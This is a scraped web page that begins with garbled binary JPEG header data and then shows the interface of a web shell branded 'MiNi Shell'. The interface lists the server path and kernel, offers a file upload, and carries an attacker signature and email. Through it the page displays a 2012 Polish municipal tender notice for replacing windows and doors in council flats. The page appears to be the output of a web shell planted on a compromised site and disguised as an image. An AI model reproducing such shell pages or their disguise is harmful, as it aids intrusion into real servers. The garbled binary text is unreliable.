JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120314/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120314/79252-N-2012.html

<p class="kh_header"><b>Jastrzębie-Zdrój: Wymiana stolarki okiennej drewnianej oraz stolarki drzwiowej w mieszkaniach gminnych w Jastrzębiu-Zdroju</b><br>
<b>Numer ogłoszenia: 79252 - 2012; data zamieszczenia: 14.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Nieruchomości , ul. 1-go Maja 55, 44-330 Jastrzębie-Zdrój, woj. śląskie, tel. 032 4787001, faks 032 4762952.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzn.jastrzebie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wymiana stolarki okiennej drewnianej oraz stolarki drzwiowej w mieszkaniach gminnych w Jastrzębiu-Zdroju.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Zadanie nr 1. Wymiana stolarki okiennej drewnianej w lokalach mieszkalnych w budynkach mieszkalnych wielorodzinnych administrowanych przez MZN w ilości planowanej: 150,56 m2.
 Wymianę stolarki okiennej drewnianej należy wykonać wraz z obróbką osadzenia i robotami towarzyszącymi - zgodnie ze Specyfikacją Techniczną Wykonania i Odbioru Robót oraz Przedmiarem robót.
Zamawiający dopuszcza możliwość zmiany asortymentu okien w stosunku do załącznika nr 1 w trakcie realizacji. 
Zamawiający przekaże Wykonawcy wykaz lokali mieszkalnych w terminie do 5 dni od podpisania umowy.
Zamawiający dopuszcza możliwość zmiany adresów w trakcie trwania umowy.
Pomiary i ustalenie  ostatecznej  listy stolarki  do wymiany, przedstawienie harmonogramu z przybliżonymi terminami wymiany Wykonawca winien dokonać do 30 dni  od podpisania umowy.
1.1.Wymagane parametry techniczne okien i drzwi balkonowych drewnianych:
1)Drewno  iglaste   klejone   trójwarstwowo  na  grubości,  łączone  na   długości  na   mikrowczepy (z wycięciem   sęków),   impregnowane,   szpachlowane   i   gruntowane   farbą   podkładową   oraz dwukrotnie  malowane   farbą   nawierzchniową wodorozcieńczalną akrylową). Do oferty należy dołączyć dokument potwierdzający właściwości drewna klejonego.
2)Okucia   obwiedniowe,   rozwieralnouchylne   z   funkcją   mikrowentylacji   w   co   najmniej 1 skrzydle (standardowo w skrzydle prawym).
3) Rodzaj   oszklenia   -   szkło   zespolone,   niskoemisyjne   o   współczynniku   przenikania   ciepła max.U=1,1 lub mniejszym.
4) Kolor elementów drewnianych - obustronny biały, klamki w kolorze białym.
5) Dla okien o ilości skrzydeł więcej niż 1  - słupek dzielny stały, dla drzwi balkonowych dwuskrzydłowych - słupek ruchomy (nie dopuszcza się montażu stolarki bez rozdzielenia skrzydeł za pomocą słupków), dla okien wewnętrznych między kuchnią i łazienką (uchylne) - okucia powinny umożliwić całkowity uchył np. w celu umycia okna.
6) Dla   zestawu   okno-drzwi   balkonowe   należy   zastosować   obustronną   listwę   maskującą o parametrach  (kolor, obróbka krawędzi itp.) zbliżonych do parametrów stolarki.
7) Podwójne   lub   pojedyncze   uszczelki   wciskane,   z   tworzywa   termoplastycznego   o   profilu zamkniętym.
8) Aluminiowa szyna okapnik przeciwdeszczowa na skrzydle i ramiaku z przykryciem progu ościeżnicy.
9) Nawiewnik   higrosterowany   AERECO   z   możliwością   przymknięcia   wraz   z   okapem standardowym (zakres pracy od 30 do 70% wilgotności względnej w pomieszczeniu, przepływ powietrza od 5 do 35 m3/h, tłumienie akustyczne 33 ?5% dB(A) (z okapem standardowym)). 
Nawiewniki należy stosować we wszystkich oknach oraz wszystkich drzwiach balkonowych dwuskrzydłowych (1 nawiewnik 1 okno lub drzwi).
10) W oknach montowanych w budynkach przy ul. Śląskiej należy zamontować listwę maskującą z drewna jak stolarka okienna i w takim samym kolorze.
11)Współczynnik stałej infiltracji powietrza  a  - 0,3 m3/mh daPa2/3   - wymagany jest dokument potwierdzający parametry wraz z oznaczeniem wartości.
12) Zgodnie z Ustawą o wyrobach budowlanych z 30 kwietnia 2004 r. wyrób budowlany nadaje się do stosowania przy wykonywaniu robót budowlanych jeżeli jest:
a) oznaczony CE, co oznacza, że dokonano oceny jego zgodności z normą zharmonizowaną 
albo europejską aprobata techniczną bądź krajową specyfikacją techniczną państwa członkowskiego Unii   Europejskiej lub Europejskiego Obszaru Gospodarczego, uznaną przez Komisję Europejską za zgodną  z wymaganiami podstawowymi,
b)   umieszczony w   określonym   przez   Komisję Europejską  wykazie wyrobów mających niewielkie znaczenie dla zdrowia i bezpieczeństwa, dla których producent wydał deklarację 
zgodności z uznanymi regułami sztuki budowlanej,
c) oznakowany,  z zastrzeżeniem  wyrobów  oznakowanych  CE, znakiem budowlanym  wg wzoru określonego w Ustawie o wyrobach budowlanych.
1.2. Utylizacja materiałów pochodzących z demontażu - w zakresie Wykonawcy.
1.3. Dokonanie wizji i przedstawienie harmonogramu wymiany okien: do 30 dni od podpisania umowy

2.Zadanie nr 2. Wymiana drzwi wewnętrznych mieszkalnych w lokalach mieszkalnych w budynkach wielorodzinnych administrowanych przez MZN w następujących ilościach:
a) drzwi wejściowe 90cm - 1szt. (90x200)
b) drzwi wejściowe 80cm - 7szt. (80x200)
drzwi wejściowe łącznie: - 8 szt.
a) drzwi pokojowe 80cm - 8 szt. (80x200)
b) drzwi kuchenne 70cm - 2 szt. (70x200)
c) drzwi łazienkowe 70cm - 5 szt. (70x200)
d) drzwi kuchenne 80cm - 2 szt. (80x200)
e) drzwi WC 60cm - 1 szt. (60x200)
drzwi wewnętrzne łącznie: - 18 szt.
ŁĄCZNIE: - 26 szt.
wraz z robotami towarzyszącymi - zgodnie ze Specyfikacją Techniczną Wykonania i Odbioru Robót oraz Przedmiarem robót.
Wykaz lokali mieszkalnych Wykonawca zobowiązany jest odebrać w terminie do 3-ch dni od podpisania umowy.
Zamawiający dopuszcza możliwość zmiany adresów w trakcie trwania umowy.
Pomiary i ustalenie ostatecznej listy stolarki  do wymiany, przedstawienie harmonogramu z przybliżonymi terminami wymiany Wykonawca winien dokonać do 30 dni  od podpisania umowy.
2.1. Wymagane parametry techniczne stolarki drzwiowej:
a) ościeżnica stalowa malowana farbą podkładową i dwukrotnie farbą  nawierzchniową w kolorze dostosowanym do koloru skrzydła,
b) listwy  progowe aluminiowe w kolorze srebrnym matowym,
c) skrzydła drzwiowe pokojowe i kuchenne z przeszkleniem   typu   -  duża   ramka  -   kolor wiśnia lub zbliżony (komplet dla całego mieszkania),
- konstrukcja skrzydła - rama z  płyty MDF lub drewna sosnowego klejonego, z wkładem stabilizacyjnym   (wypełnienie plaster miodu lub płyta wiórowa z otworami), pokryte dwiema płytami HDF,
- dwa zawiasy czopowe umożliwiające regulację,
- wyposażone w zamek na klucz zwykły i komplet kluczy,
-szyba o gr. 4 mm: CHINCHILA lub KORA BIAŁA (komplet dla całego mieszkania),
d) skrzydła drzwiowe łazienkowe  i do  WC   z   przeszkleniem   typu   -   mała   ramka  -   kolor wiśnia lub zbliżony (komplet dla całego mieszkania),
- konstrukcja skrzydła   -  rama   z   płyty  MDF lub   drewna  sosnowego  klejonego z wkładem stabilizacyjnym
(wypełnienie plaster miodu lub  płyta wiórowa z otworami), pokryte dwiema płytami HDF,
- kratka wentylacyjna (min. powierzchnia otworu 220 cm2),
- dwa zawiasy czopowe umożliwiające regulację,
- wyposażone w zamek z blokadą łazienkową, klamki,
- szyba o gr. 4 mm: CHINCHILA lub KORA BIAŁA (komplet dla całego mieszkania),
e) skrzydła drzwiowe wejściowe pełne, wzmacniane - kolor wiśnia lub zbliżony (komplet dla całego mieszkania) wraz z progiem:
- konstrukcja skrzydła - rama z płyty MDF lub drewna sosnowego klejonego, z wkładem stabilizacyjnym wypełnieniem płytą wiórową z otworami), pokryte dwiema płytami HDF,
- trzy zawiasy kątowe regulowane,
- wyposażone w dwa zamki w tym jeden  wpuszczany w ramę na wkładkę (wraz z wkładką), klamki i rozety lub szyldy, z kompletem trzech kluczy,
- montaż progów z twardego drewna  z uszczelką (wykończony  fabrycznie lub malowany w kolorze ościeżnicy) - wysokość progu nie może przekroczyć 0,02 m, próg osadzony za pomocą co najmniej 3 kołków rozporowych lub inny trwały sposób.
Zamawiający dopuszcza stosowanie jedynie wyrobów spełniających wymogi określone w Ustawie z  dnia 16 kwietnia 2004r. o wyrobach budowlanych Dz. U. z 2004r. Nr 92 poz. 881. 
Wymagane jest wskazanie i dostarczenie dokumentów  na podstawie których wyroby zostaną wprowadzone do obrotu i zastosowane do zrealizowania zadania. Dokumenty dotyczące stolarki muszą odnosić się do całego wyrobu (ościeżnic z wszystkimi elementami, skrzydło z zawiasami i osprzętami itd.).
2.2. Zakres   ilościowy   robót   określony   jest   w   przedmiarze   robót.   W   przypadku   stwierdzenia konieczności   wykonania   robót   nie   ujętych   w   przedmiarze   i   w   STWiOR,   a   niezbędnych do   realizacji   zadania   jako   całości   -  należy   je   uwzględnić   w   ofercie   lub   wnieść   uwagi przed   złożeniem  oferty.   Przedmiar robót należy traktować jako dokument pomocniczy, który określa jedynie minimalny zakres robót. Wycena robót powinna opierać się na przeprowadzonej wizji, opisie robót i z uwzględnieniem wszelkich niezbędnych czynności i nakładów
2.3. Utylizacja materiałów pochodzących z demontażu - w zakresie Wykonawcy.
2.4. Dokonanie wizji i przedstawienie harmonogramu wymiany drzwi: do 30 dni od podpisania umowy

3.Warunki techniczne: 
3.1. Szczegółowy zakres robót wraz z parametrami technicznymi stolarki drzwiowej, stolarki okiennej drewnianej, sposobem rozliczenia robót oraz wymaganiami dotyczącymi sposobu montażu zawarty jest w Załącznikach do SIWZ Specyfikacjach Technicznych Wykonania i Odbioru Robót.
3.2. Do wykonania zadania będą użyte materiały posiadające atesty, certyfikaty, dopuszczenie do stosowania, nie posiadające uszkodzeń. 
3.3. Za wypadki i szkody powstałe przy wykonywaniu robót odpowiada Wykonawca. Odpowiedzialność cywilną wobec osób trzecich jak i z tytułu zdarzeń losowych przyjmuje na siebie Wykonawca. 
3.4. Wykonawca jest zobowiązany przestrzegać rygorów wynikających z Prawa budowlanego. 
3.5. W czasie realizacji robót Wykonawca będzie utrzymywał na swój koszt i ryzyko teren robót w stanie wolnym od przeszkód komunikacyjnych oraz będzie usuwał wszelkie zbędne materiały, odpady oraz niepotrzebne urządzenia prowizoryczne.
Wycena oferty winna uwzględniać wszystkie koszty i czynności niezbędne do wykonania przedmiotu  zamówienia zgodnie z prawem i najlepszą wiedzą techniczną..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.42.11.30-4, 45.42.11.32-8, 45.42.11.31-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium:
Zadanie nr 1: 1.800,00 zł (słownie: jeden tysiąc osiemset złotych 00/100)
Zadanie nr 2; 400,00 zł (słownie: czterysta złotych 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się Wykonawcy, którzy udokumentują: 
- Zadanie nr 1 - wykonanie w okresie ostatnich 5 lat przed upływem terminu składania ofert 1 zadanie o charakterze podobnym do przedmiotu zamówienia (wymiana stolarki okiennej drewnianej) o wartości min.: 62.000,00 zł brutto. 
- Zadanie nr 2 - wykonanie w okresie ostatnich 5 lat przed upływem terminu składania ofert 1 zadanie o charakterze  podobnym do przedmiotu zamówienia (wymiana stolarki drzwiowej wewnętrznej wejściowej i lokalowej) o wartości min.: 15.000,00 zł brutto.
Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia - nie spełnia.
Nie spełnienie chociażby jednego warunku, skutkować będzie wykluczeniem Wykonawcy z postępowania  odrzuceniem jego oferty</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O wykonanie zamówienia publicznego  moga ubiegać się Wykonawcy, którzy
- Zadanie nr 1 i 2 -dysponują lub będą dysponować przy wykonywanych pracach osobą, która będzie pełnić funkcję kierownika robót, posiadającą uprawnienia określone przepisami Prawa budowlanego do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej.

Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia - nie spełnia.
Nie spełnienie chociażby jednego warunku, skutkować będzie wykluczeniem Wykonawcy z postępowania  odrzuceniem jego oferty</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z europejskimi normami zarządzania środowiskiem, jeżeli zamawiający wskazują środki zarządzania środowiskiem, które wykonawca będzie stosował podczas realizacji zamówienia na roboty budowlane lub usługi, odwołując się do systemu zarządzania środowiskiem i audytu (EMAS) lub norm zarządzania środowiskiem opartych na europejskich lub międzynarodowych normach poświadczonych przez podmioty działające zgodnie z prawem Unii Europejskiej, europejskimi lub międzynarodowymi normami dotyczącymi certyfikacji</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) III 5) Dotyczy tylko zadania 1: W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez  Zamawiającego, Zamawiający żąda zaświadczenia podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty tj. okna są z drewna iglastego klejonego trójwarstwowo na grubości, łączone na długości na mikrowczepy (z wycięciem sęków), impregnowane, szpachlowane i gruntowane farbą podkładową oraz dwukrotnie malowane farbą nawierzchniową wodorozcieńczalną (akrylową) odpowiadają określonym normom lub specyfikacjom technicznym. Do oferty należy dołączyć dokument potwierdzający właściwości drewna klejonego.
2) Druk Oferta
3) Dowód wniesienia wadium
4) Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia lub inny dokument z którego wynikać będzie, że wykonawca takimi osobami będzie dysponował, jeżeli przy realizacji zadania polegać będzie na osobach zdolnych do wykonania zamówienia innego podmiotu</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy z zastrzeżeniem:
a) postanowień § 6 umowy
oraz w przypadku:
b) zmiany terminu wykonania umowy w przypadku braku udostępnienia mieszkania przez lokatora w wyznaczonym terminie,
c)  zmiany ilości i wymiarów stolarki okiennej*(zapis będzie dotyczył tylko tej części, na którą zostanie złożona oferta) stolarki drzwiowej*(zapis będzie dotyczył tylko tej części, na którą zostanie złożona oferta) do wymiany dokonanej przez Zamawiającego po zatwierdzeniu harmonogramu prac i przekazaniu wykazu mieszkań,
d) zmiany wysokości wynagrodzenia Wykonawcy w przypadku zmiany ilości i wymiarów wymienionej stolarki drzwiowej*(zapis będzie dotyczył tylko tej części, na którą zostanie złożona oferta); 
e) w przypadku zbycia  lub nabycia przez Zamawiającego obiektów;
f) w przypadku prowadzenia prac remontowych,
g) w przypadku zmian  Inspektorów nadzoru,
h) w przypadku zmian kadrowo - personalnych, utraty wymaganych uprawnień, utraty stanowiska;
i) w przypadku wystąpienia okoliczności, których Zamawiający nie był w stanie przewidzieć, pomimo zachowania należytej staranności;
j) zmniejszenie zakresu wynagrodzenia z przyczyn o obiektywnym charakterze, istotnej zmiany okoliczności powodującej, że wykonanie części zakresu realizacji umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia;
k) zakres rzeczowy zamówienia  określony umową może zostać ograniczony przez Zamawiającego, bez skutków finansowych i prawnych dla Zamawiającego, w przypadku gdy wykonanie przedmiotu  zamówienia w pełnym zakresie nie leży w interesie publicznym, czego nie można było wcześniej przewidzieć;
l) w przypadku zmiany  dotyczącej  nazw, siedziby Wykonawcy lub jego formy organizacyjno-prawnej w trakcie trwania umowy, numerów kont bankowych oraz innych danych identyfikacyjnych;
ł)zmiany prowadzące do likwidacji oczywistych omyłek pisarskich i rachunkowych w treści umowy;
m) dopuszczalne są wszelkie zmiany nieistotne rozumiane w ten sposób, że wiedza o ich wprowadzeniu na etapie postępowania o zamówienie nie wpłynęła na krąg podmiotów ubiegających się o zamówienie ani na wynik postępowania o udzielenie zamówienia publicznego;
n) w zakresie podwykonawców, wskazanych  na etapie  złożonej  oferty lub, których konieczność  ujawnienia wynikła na etapie  realizacji zamówienia, którym wykonawca powierzył lub ma zamiar powierzyć wykonanie części zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzn.jastrzebie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miesjki Zarząd Nieruchomości  ul. 1 Maja 55, 44-330 Jastrzebie-Zdrój.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.03.2012 godzina 09:00, miejsce: Miesjki Zarząd Nieruchomości  ul. 1 Maja 55, 44-330 Jastrzebie-Zdrój, pok. nr 8.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com